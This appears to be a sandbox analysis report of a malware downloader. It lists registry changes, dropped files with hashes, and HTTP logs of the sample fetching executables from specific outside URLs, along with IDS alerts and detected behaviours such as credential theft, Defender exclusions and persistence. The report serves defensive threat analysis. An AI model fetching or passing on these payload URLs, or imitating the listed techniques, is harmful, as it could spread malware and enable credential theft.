628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F
(PID) Process:	(2064) 4363463463464363463463463.bin.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Operation:	write	Name:	Blob
Value: 040000000100000010000000C5DFB849CA051355EE2DBA1AC33EB028090000000100000054000000305206082B0601050507030206082B06010505070303060A2B0601040182370A030406082B0601050507030406082B0601050507030606082B0601050507030706082B0601050507030106082B060105050703080F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA9531400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B0B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D002000520033000000190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F530000000100000040000000303E301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0301B060567810C010330123010060A2B0601040182373C0101030200C02000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F
(PID) Process:	(1816) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(1844) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(452) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2596) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2524) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(3076) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2596) 4363463463464363463463463.bin.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1

Add for printing

Executable files

770

Suspicious files

220

Text files

1 687

Unknown types

Dropped files

PID	Process	Filename		Type
2596	4363463463464363463463463.bin.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506		compressed
		MD5:AC05D27423A85ADC1622C714F2CB6184	SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
2596	4363463463464363463463463.bin.exe	C:\Users\admin\Desktop\Files\laplas03.exe		executable
		MD5:5B20C36902B56F9EACCABF9204600407	SHA256:1911E52F76C3B03295FA0EAA7B30B70809C1E9E78ABED5A23B30239134A87EF0
2596	4363463463464363463463463.bin.exe	C:\Users\admin\AppData\Local\Temp\Cab5985.tmp		compressed
		MD5:AC05D27423A85ADC1622C714F2CB6184	SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
3244	Wattyl.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\setting[1].nql		text
		MD5:FDA44910DEB1A460BE4AC5D56D61D837	SHA256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
3244	Wattyl.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\setting[1].xls		text
		MD5:FDA44910DEB1A460BE4AC5D56D61D837	SHA256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
3796	is-SSOM8.tmp	C:\Users\admin\AppData\Local\PCI Device Checker\bin\x86\is-U653V.tmp		executable
		MD5:F0F973781B6A66ADF354B04A36C5E944	SHA256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
2596	4363463463464363463463463.bin.exe	C:\Users\admin\AppData\Local\Temp\Tar5986.tmp		binary
		MD5:9C0C641C06238516F27941AA1166D427	SHA256:4276AF3669A141A59388BC56A87F6614D9A9BDDDF560636C264219A7EB11256F
3796	is-SSOM8.tmp	C:\Users\admin\AppData\Local\Temp\is-7EQE2.tmp\_isetup\_shfoldr.dll		executable
		MD5:92DC6EF532FBB4A5C3201469A5B5EB63	SHA256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
2596	4363463463464363463463463.bin.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506		binary
		MD5:803FE2EE01FA77B5BCA2C8E6D94A1307	SHA256:70C83C04E244FC3831A29810142B1BBB2A4BFADAA38B3D64773B66151CD3E31A
3244	Wattyl.exe	C:\Windows\system32\RVHOST.exe		executable
		MD5:34E03669773D47D0D8F01BE78AE484E4	SHA256:2919B157D8D2161BF56A17AF0EFC171D8E2C3C233284CF116E8C968DD9704572

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

208

TCP/UDP connections

1 307

DNS requests

397

Threats

842

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
452	4363463463464363463463463.bin.exe	GET	200	103.14.122.111:80	http://unicorpbrunei.com/Products/Wattyl/Wattyl.exe	unknown	executable	477 Kb	unknown
1844	4363463463464363463463463.bin.exe	GET	200	31.41.244.146:80	http://31.41.244.146/Downnnnloads/laplas03.exe	unknown	executable	4.30 Mb	unknown
1816	4363463463464363463463463.bin.exe	GET	200	115.71.237.171:80	http://support.clz.kr/soft_hair/PCSupport.exe	unknown	executable	533 Kb	unknown
2596	4363463463464363463463463.bin.exe	GET	200	68.66.226.93:80	http://thedoctorsgym.net/10/data64_1.exe	unknown	executable	159 Kb	unknown
1028	4363463463464363463463463.bin.exe	GET	200	176.126.201.5:80	http://artmediastudio.ro/Amdau.exe	unknown	executable	3.20 Mb	unknown
3076	4363463463464363463463463.bin.exe	GET	200	172.67.168.30:80	http://never.hitsturbo.com/order/tuc4.exe	unknown	executable	3.92 Mb	unknown
2524	4363463463464363463463463.bin.exe	GET	200	68.66.226.93:80	http://thedoctorsgym.net/10/data64_5.exe	unknown	executable	2.02 Mb	unknown
2596	4363463463464363463463463.bin.exe	GET	200	2.19.198.72:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?96dd78d04d49333d	unknown	compressed	65.2 Kb	unknown
3244	Wattyl.exe	GET	301	104.18.38.120:80	http://www.freewebs.com/nhattruongquang/setting.nql	unknown	—	—	unknown
3244	Wattyl.exe	GET	301	104.18.38.120:80	http://www.freewebs.com/nhattruongquang/setting.xls	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
1080	svchost.exe	224.0.0.252:5355	—	—	—	unknown
2064	4363463463464363463463463.bin.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	unknown
1816	4363463463464363463463463.bin.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	unknown
1816	4363463463464363463463463.bin.exe	115.71.237.171:80	support.clz.kr	DAOU TECHNOLOGY	KR	unknown
1844	4363463463464363463463463.bin.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	unknown
1844	4363463463464363463463463.bin.exe	31.41.244.146:80	—	Red Bytes LLC	RU	unknown
452	4363463463464363463463463.bin.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	unknown
452	4363463463464363463463463.bin.exe	103.14.122.111:80	unicorpbrunei.com	Good Domain Registry Private Limited	IN	unknown

DNS requests

Domain	IP	Reputation
urlhaus.abuse.ch	151.101.2.49 151.101.66.49 151.101.130.49 151.101.194.49	whitelisted
support.clz.kr	115.71.237.171	unknown
unicorpbrunei.com	103.14.122.111	unknown
thedoctorsgym.net	68.66.226.93	unknown
never.hitsturbo.com	172.67.168.30 104.21.46.59	malicious
bufetesanchezabogados.com	185.221.216.35	malicious
artmediastudio.ro	176.126.201.5	malicious
ctldl.windowsupdate.com	2.19.198.72 2.19.198.57 23.32.238.88 2.19.198.75 2.19.198.58 2.19.198.64 23.32.238.89 23.32.238.96 23.32.238.105 23.32.238.129 23.32.238.130 23.32.238.155	whitelisted
lang.topteamlife.com	188.114.96.3 188.114.97.3	malicious
bitbucket.org	104.192.141.1	shared

Threats

PID	Process	Class	Message
1816	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
1844	4363463463464363463463463.bin.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 1
1844	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
1844	4363463463464363463463463.bin.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
1844	4363463463464363463463463.bin.exe	Misc activity	ET INFO Packed Executable Download
452	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
2596	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
2524	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	AV POLICY HTTP request for .exe file with no User-Agent
2524	4363463463464363463463463.bin.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2524	4363463463464363463463463.bin.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

41 ETPRO signatures available at the full report

Add for printing

Process	Message
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	The specified executable is not a valid application for this OS platform.
4363463463464363463463463.bin.exe	An exception occurred during a WebClient request.
4363463463464363463463463.bin.exe	An exception occurred during a WebClient request.
4363463463464363463463463.bin.exe	The remote server returned an error: (403) Forbidden.
4363463463464363463463463.bin.exe	Unable to connect to the remote server

General Info

4363463463464363463463463.bin

2A94F3960C58C6E70826495F76D00B85

E2A1A5641295F5EBF01A37AC1C170AC0814BB71A

2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE

192:2we8sGKE6MqyG7c20L7BIW12n/ePSmzkTInu8stYcFwVc03KY:9e8sGKfMqyGg20PKn/cRaInuptYcFwVY

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

HAUSBOMBER has been detected (YARA)

Changes the login/logoff helper path in the registry

Creates a writable file in the system directory

MARSSTEALER has been detected (YARA)

Create files in the Startup directory

Actions looks like stealing of personal data

Uses sleep, probably for evasion detection (SCRIPT)

Adds path to the Windows Defender exclusion list

Detected an obfuscated command line used with Guloader

REDLINE has been detected (YARA)

Steals credentials from Web Browsers

Changes appearance of the Explorer extensions

Changes the autorun value in the registry

Uses Task Scheduler to run other applications

Checks whether a specified folder exists (SCRIPT)

Uses Task Scheduler to autorun other applications

Modify registry editing tools (regedit)

Task Manager has been disabled (taskmgr)

ARKEI has been detected (YARA)

AMADEY has been detected (YARA)

METASTEALER has been detected (YARA)

RISEPRO has been detected (YARA)

Deletes a file (SCRIPT)

QUASAR has been detected (YARA)

LUMMA has been detected (YARA)

HIJACKLOADER has been detected (YARA)

Bypass execution policy to execute commands

Changes powershell execution policy (Bypass)

Adds process to the Windows Defender exclusion list

Starts CMD.EXE for self-deleting

SUSPICIOUS

Reads the Internet Settings

Adds/modifies Windows certificates

Reads settings of System Certificates

The process creates files with name similar to system file names

Starts CMD.EXE for commands execution

Creates or modifies Windows services

Reads the Windows owner or organization settings

Searches for installed software

Starts application with an unusual extension

The process executes VB scripts

The process verifies whether the antivirus software is installed

Runs shell command (SCRIPT)

Executing commands from a ".bat" file

Script adds exclusion path to Windows Defender

Starts POWERSHELL.EXE for commands execution

Using PowerShell to operate with local accounts

Uses WMI to retrieve WMI-managed resources (SCRIPT)

Creates FileSystem object to access computer's file system (SCRIPT)

Executes WMI query (SCRIPT)

Base64-obfuscated command line is found

Checks whether a specific file exists (SCRIPT)

Reads browser cookies

Reads the BIOS version

Uses TIMEOUT.EXE to delay execution

The process checks if it is being run in the virtual environment

Uses NETSH.EXE to change the status of the firewall

Uses REG/REGEDIT.EXE to modify registry

Uses ATTRIB.EXE to modify file attributes

Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

Detected use of alternative data streams (AltDS)

Reads security settings of Internet Explorer

Checks Windows Trust Settings

Starts NET.EXE to map network drives

Gets full path of the running script (SCRIPT)

Loads DLL from Mozilla Firefox

Accesses Microsoft Outlook profiles

Probably delay the execution using 'w32tm.exe'

Uses ICACLS.EXE to modify access control lists